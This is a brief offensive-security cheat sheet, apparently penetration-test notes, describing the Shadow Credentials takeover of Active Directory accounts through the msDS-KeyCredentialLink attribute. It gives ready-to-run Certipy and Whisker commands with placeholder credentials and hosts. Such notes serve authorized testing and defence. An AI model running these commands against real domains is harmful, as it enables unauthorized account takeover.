Shadow Credentials

Shadow Credentials is an attack technique to take over Active Directory user/computer account by compromising msDS-KeyCredentialLink property of target objects.

- [kerberos-abuse](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials)

Exploit

If the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates, he takes over the account in AD.

Using Certipy

# -k: Use Kerberos authentication
certipy shadow auto -account "targetuser" -u "username@example.local" -p 'password' -dc-ip 10.0.0.1 -target dc.example.local -k

Using Whisker

Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute.

Whisker.exe add /target:john /domain:example.local